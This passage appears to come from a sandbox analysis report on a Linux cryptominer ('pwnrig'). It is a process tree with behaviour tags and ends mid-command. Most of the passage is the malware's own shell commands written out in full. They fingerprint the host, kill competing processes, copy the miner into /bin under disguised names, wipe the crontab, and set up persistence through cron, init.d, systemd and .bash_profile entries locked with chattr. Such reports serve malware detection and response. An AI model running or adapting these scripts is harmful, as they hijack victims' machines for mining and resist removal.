-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:2534 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
- Attempts to change immutable files
PID:2535 -
/usr/bin/hostnamehostname -I4⤵PID:2538
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:2540
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵PID:2545
-
-
/usr/bin/headhead -n 14⤵PID:2544
-
-
/usr/bin/grepgrep "Port "4⤵PID:2543
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵PID:2542
-
-
/usr/bin/whoamiwhoami4⤵PID:2546
-
-
/usr/bin/hostnamehostname4⤵PID:2547
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:2548
-
-
/usr/bin/sedsed -e "s/\$//"4⤵PID:2554
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵PID:2553
-
-
/usr/bin/cutcut -d: -f24⤵PID:2552
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:2551
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:2557
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:2560
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:2563
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:2564
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:2566
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵PID:2565
-
-
/usr/bin/idid -u4⤵PID:2568
-
-
/usr/bin/grepgrep -v grep4⤵PID:2571
-
-
/usr/bin/grepgrep /etc/cron4⤵PID:2570
-
-
/usr/bin/psps x4⤵
- Reads CPU attributes
PID:2569
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- File and Directory Permissions Modification
- Writes file to tmp directory
PID:2573 -
/usr/bin/idid -u4⤵PID:2574
-
-
/usr/bin/idid -u4⤵PID:2575
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵PID:2576
-
-
/usr/bin/rmrm -rf /bin/bprofr4⤵PID:2577
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵PID:2578
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr4⤵
- Writes file to system bin folder
PID:2579
-
-
/usr/bin/idid -u4⤵PID:2580
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵PID:2581
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵PID:2582
-
-
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:2583
-
-
/usr/bin/rmrm -rf /bin/crondr4⤵PID:2584
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr4⤵
- Writes file to system bin folder
PID:2585
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
PID:2587
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:2588
-
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
- File and Directory Permissions Modification
PID:2589
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:2590
-
-
/usr/bin/whichwhich chkconfig4⤵PID:2591
-
-
/usr/bin/whichwhich update-rc.d4⤵PID:2592
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵PID:2593
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵
- Flushes firewall rules
PID:2594 -
/usr/local/sbin/systemctlsystemctl --quiet disable pwnrig5⤵PID:2595
-
-
/usr/local/bin/systemctlsystemctl --quiet disable pwnrig5⤵PID:2595
-
-
/usr/sbin/systemctlsystemctl --quiet disable pwnrig5⤵PID:2595
-
-
/usr/bin/systemctlsystemctl --quiet disable pwnrig5⤵
- Reads EFI boot settings
PID:2595
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:2621
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:2621
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:2621
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
PID:2621
-
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵PID:2647
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:2648
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:2648
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:2648
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
PID:2648
-
-
-
/usr/bin/rmrm -rf /bin/initdr4⤵PID:2674
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr4⤵
- Writes file to system bin folder
PID:2675
-
-
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
PID:2677
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Modifies init.d
PID:2678
-
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵
- File and Directory Permissions Modification
PID:2679
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵PID:2680
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:2681
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:2681
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:2681
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:2681
-
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable4⤵PID:2707
-
/usr/local/sbin/systemctlsystemctl --quiet enable pwnrig5⤵PID:2708
-
-
/usr/local/bin/systemctlsystemctl --quiet enable pwnrig5⤵PID:2708
-
-
/usr/sbin/systemctlsystemctl --quiet enable pwnrig5⤵PID:2708
-
-
/usr/bin/systemctlsystemctl --quiet enable pwnrig5⤵PID:2708
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:2709
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:2709
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:2709
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:2709
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr4⤵PID:2735
-
-
/usr/bin/whichwhich systemctl4⤵PID:2736
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵
- Attempts to change immutable files
PID:2737
-
-
/usr/bin/rmrm -rf /bin/sysdr4⤵PID:2738
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr4⤵
- Writes file to system bin folder
PID:2739
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Modifies systemd
PID:2741
-
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵PID:2742
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵PID:2743
-
-
/usr/bin/systemctlsystemctl enable pwnrige.service4⤵
- Reads EFI boot settings
PID:2744
-
-
/usr/bin/systemctlsystemctl enable pwnrigl.service4⤵PID:2770
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
PID:2796
-
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service4⤵
- Reads EFI boot settings
PID:2822
-
-
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:2879 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:2903
-
/usr/bin/hostnamehostname -I4⤵PID:2906
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:2908
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵PID:2913
-
-
/usr/bin/headhead -n 14⤵PID:2912
-
-
/usr/bin/grepgrep "Port "4⤵PID:2911
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵PID:2910
-
-
/usr/bin/whoamiwhoami4⤵PID:2914
-
-
/usr/bin/hostnamehostname4⤵PID:2915
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:2916
-
-
/usr/bin/sedsed -e "s/\$//"4⤵PID:2922
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵PID:2921
-
-
/usr/bin/cutcut -d: -f24⤵PID:2920
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:2919
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:2925
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:2928
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:2931
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:2932
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:2934
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵PID:2933
-
-
/usr/bin/idid -u4⤵PID:2936
-
-
/usr/bin/grepgrep -v grep4⤵PID:2939
-
-
/usr/bin/grepgrep /etc/cron4⤵PID:2938
-
-
/usr/bin/psps x4⤵
- Reads runtime system information
PID:2937
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
- Security Software Discovery
PID:2941 -
/usr/bin/idid -u4⤵PID:2942
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵PID:2947
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd4⤵PID:2946
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"4⤵PID:2945
-
-
/usr/bin/grepgrep -v grep4⤵PID:2944
-
-
/usr/bin/psps aux4⤵
- Process Discovery
PID:2943
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵
- Security Software Discovery
PID:2949 -
/usr/bin/idid -u4⤵PID:2950
-
-
/usr/bin/wcwc -l4⤵PID:2956
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵PID:2955
-
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"4⤵PID:2954
-
-
/usr/bin/grepgrep -v grep4⤵PID:2953
-
-
/usr/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:2952
-
-
-
-
/usr/bin/crontabcrontab -r2⤵PID:2959
-
-
/usr/bin/pkillpkill -f .klibsystem52⤵
- Reads CPU attributes
- Reads runtime system information
PID:2960
-
-
/usr/bin/pkillpkill -f .klibsystem42⤵
- Reads runtime system information
PID:2961
-
-
/usr/bin/bashbash -c "echo \"* * * * * /home/.klibsystem5 >/dev/null 2>&1\" | crontab -"2⤵PID:2962
-
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
PID:2964
-
-
-
/tmp/sys-helper/tmp/sys-helper2⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:2965
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Enumerates kernel/hardware configuration
PID:2966 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:2967
-
/usr/bin/hostnamehostname -I4⤵PID:2970
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:2972
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵PID:2977
-
-
/usr/bin/headhead -n 14⤵PID:2976
-
-
/usr/bin/grepgrep "Port "4⤵PID:2975
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵PID:2974
-
-
/usr/bin/whoamiwhoami4⤵PID:2978
-
-
/usr/bin/hostnamehostname4⤵PID:2979
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:2980
-
-
/usr/bin/sedsed -e "s/\$//"4⤵PID:2986
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵PID:2985
-
-
/usr/bin/cutcut -d: -f24⤵PID:2984
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:2983
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:2989
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:2992
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:2995
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:2996
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:2998
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵
- Reads CPU attributes
PID:2997
-
-
/usr/bin/idid -u4⤵PID:3000
-
-
/usr/bin/grepgrep -v grep4⤵PID:3003
-
-
/usr/bin/grepgrep /etc/cron4⤵PID:3002
-
-
/usr/bin/psps x4⤵
- Reads CPU attributes
PID:3001
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile 